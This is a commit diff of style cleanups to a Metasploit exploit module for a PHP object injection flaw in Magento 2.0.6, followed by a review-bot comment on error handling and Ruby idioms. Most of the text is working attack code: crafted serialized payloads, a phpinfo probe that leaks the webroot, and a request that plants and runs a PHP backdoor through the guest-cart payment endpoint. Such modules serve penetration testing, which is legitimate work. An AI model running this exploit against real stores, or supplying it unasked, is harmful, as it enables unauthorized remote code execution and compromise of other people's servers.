Cosmetic changes for magento_unserialize to pass msftidy & guidelines
parent
4f42cc8c08
commit
7c9227f70b
@ -13,16 +13,18 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {})
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Magento <= 2.0.6 Unserialize Remote Code Execution',
'Name' => 'Magento 2.0.6 Unserialize Remote Code Execution',
'Description' => %q{
'Description' => %q{
This module exploits a PHP object injection vulnerability in Magento <= 2.0.6
This module exploits a PHP object injection vulnerability in Magento 2.0.6
or prior.
},
},
'Platform' => 'php',
'Platform' => 'php',
'License' => MSF_LICENSE,
'License' => MSF_LICENSE,
'Author' => [
'Author' =>
[
'Netanel Rubin', # original discovery
'Netanel Rubin', # original discovery
'agix', # original exploit
'agix', # original exploit
'mr_me <mr_me@offensive-security.com>', # metasploit module
'mr_me <mr_me[at]offensive-security.com>', # metasploit module
],
],
'Payload' =>
'Payload' =>
{
{
@ -36,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
],
],
'Arch' => ARCH_PHP,
'Arch' => ARCH_PHP,
'Targets' => [
'Targets' =>
[
[ 'Automatic Targeting', { 'auto' => true } ],
[ 'Automatic Targeting', { 'auto' => true } ],
],
],
'DisclosureDate' => 'May 17 2016',
'DisclosureDate' => 'May 17 2016',
@ -48,6 +51,10 @@ class MetasploitModule < Msf::Exploit::Remote
], self.class)
], self.class)
end
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def get_phpinfo
def get_phpinfo
# uses the Magento_Framework_DB_Transaction class
# uses the Magento_Framework_DB_Transaction class
serialize = 'O:13:\"Credis_Client\":22:{'
serialize = 'O:13:\"Credis_Client\":22:{'
@ -149,7 +156,8 @@ class MetasploitModule < Msf::Exploit::Remote
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
serialize << 's:11:\"\u0000*\u0000requests\";'
serialize << 's:11:\"\u0000*\u0000requests\";'
serialize << 'i:0;}'
serialize << 'i:0;}'
return serialize
serialize
end
end
def get_phpshell
def get_phpshell
@ -252,14 +260,16 @@ class MetasploitModule < Msf::Exploit::Remote
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
serialize << 's:11:\"\u0000*\u0000requests\";'
serialize << 's:11:\"\u0000*\u0000requests\";'
serialize << 'i:0;}'
serialize << 'i:0;}'
return serialize
serialize
end
end
def do_check
def do_check
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
data << get_phpinfo
data << get_phpinfo
data << "\"}},\"email\":\"#{@email}\"}"
data << "\"}},\"email\":\"#{@email}\"}"
return send_request_cgi({
send_request_cgi({
'method' => 'POST',
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
'ctype' => 'application/json',
'ctype' => 'application/json',
@ -293,16 +303,19 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
end
end
end
end
rescue ::Rex::ConnectionError
rescue ::Rex::ConnectionError => e
vprint_error(e.message)
return Exploit::CheckCode::Safe
return Exploit::CheckCode::Safe
end
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
end
def get_webroot
def get_webroot
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
data << get_phpinfo
data << get_phpinfo
data << "\"}},\"email\":\"#{@email}\"}"
data << "\"}},\"email\":\"#{@email}\"}"
# we steal path via phpinfo
# we steal path via phpinfo
res = send_request_cgi({
res = send_request_cgi({
'method' => 'POST',
'method' => 'POST',
@ -310,11 +323,13 @@ class MetasploitModule < Msf::Exploit::Remote
'ctype' => 'application/json',
'ctype' => 'application/json',
'data' => data,
'data' => data,
})
})
if res and res.code == 200
if res && res.code == 200
@webroot = "#{$1}" if res.body =~ /_SERVER\["DOCUMENT_ROOT"\]<\/td><td class="v">(.*)<\/td><\/tr>/
@webroot = "#{$1}" if res.body =~ /_SERVER\["DOCUMENT_ROOT"\]<\/td><td class="v">(.*)<\/td><\/tr>/
return true
return true
end
end
return false
false
end
end
def create_fake_cart
def create_fake_cart
@ -325,10 +340,10 @@ class MetasploitModule < Msf::Exploit::Remote
'cookie' => @cookies,
'cookie' => @cookies,
'vars_get' => { 'form_key' => @form_key }
'vars_get' => { 'form_key' => @form_key }
})
})
if (res and res.body.include?('[]'))
return true
return true if (res && res.body.include?('[]'))
end
return false
false
end
end
def generate_cart_id
def generate_cart_id
@ -337,27 +352,29 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, '/checkout/cart/'),
'uri' => normalize_uri(target_uri.path, '/checkout/cart/'),
'cookie' => @cookies,
'cookie' => @cookies,
})
})
if res and res.code == 200
if res && res.code == 200
@guest_cart_id = "#{$1}" if res.body =~ /entity_id":"(.*)","store_id":\d,"created_at/
@guest_cart_id = "#{$1}" if res.body =~ /entity_id":"(.*)","store_id":\d,"created_at/
return true
return true
end
end
return false
false
end
end
def backdoor
def backdoor
data = "{\"paymentMethod\":{\"method\":\"checkmo\",\"additional_data\":{\"additional_information\":\""
data = "{\"paymentMethod\":{\"method\":\"checkmo\",\"additional_data\":{\"additional_information\":\""
data << get_phpshell
data << get_phpshell
data << "\"}},\"email\":\"#{@email}\"}"
data << "\"}},\"email\":\"#{@email}\"}"
res = send_request_cgi({
res = send_request_cgi({
'method' => 'POST',
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
'ctype' => 'application/json',
'ctype' => 'application/json',
'data' => data,
'data' => data,
})
})
if (res && res.body.include?('true'))
return true
return true if (res && res.body.include?('true'))
end
return false
false
end
end
def exec_code
def exec_code
@ -366,21 +383,22 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "/#{@backdoor}"),
'uri' => normalize_uri(target_uri.path, "/#{@backdoor}"),
}, timeout = 0.5)
}, timeout = 0.5)
end
end
def exploit
def exploit
define_globals
define_globals
@backdoor = "#{Rex::Text.rand_text_alphanumeric(26)}.php"
@backdoor = "#{Rex::Text.rand_text_alphanumeric(26)}.php"
register_files_for_cleanup("#{@backdoor}")
register_files_for_cleanup("#{@backdoor}")
if create_fake_cart && generate_cart_id
if create_fake_cart && generate_cart_id
print_good("generated a guest cart id")
print_good("generated a guest cart id")
if get_webroot
if get_webroot && backdoor
if backdoor
print_good("backdoor done!")
print_good("backdoor done!")
exec_code
exec_code
end
end
end
end
end
end
end
end
end
=begin
=begin
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/sam.rc
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/sam.rc
[*] Processing scripts/sam.rc for ERB directives.
[*] Processing scripts/sam.rc for ERB directives.
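Review bot: In the do_check hunk (`@ -293,16 +303,19 @@`) a `::Rex::ConnectionError` is now logged via `vprint_error(e.message)` but still mapped to `return Exploit::CheckCode::Safe`, which reports the target as not vulnerable when the module merely failed to reach it; that path should be `return Exploit::CheckCode::Unknown`, leaving `Safe` for the case where the phpinfo probe actually returned a non-matching response. do_check begins outside this hunk. A smaller point on the new side of get_webroot and generate_cart_id: `@webroot = "#{$1}" if res.body =~ /.../` interpolates a capture into an identical string and uses the bare global; `@webroot = Regexp.last_match(1) if res.body =~ /_SERVER\["DOCUMENT_ROOT"\]<\/td><td class="v">(.*)<\/td><\/tr>/` says the same thing, and the same pattern recurs for `@guest_cart_id`. In the exec_code hunk, `}, timeout = 0.5)` assigns a throwaway local and passes 0.5 positionally, which reads like a keyword argument but is not one; `}, 0.5)` with a short comment naming it as the request timeout would be clearer.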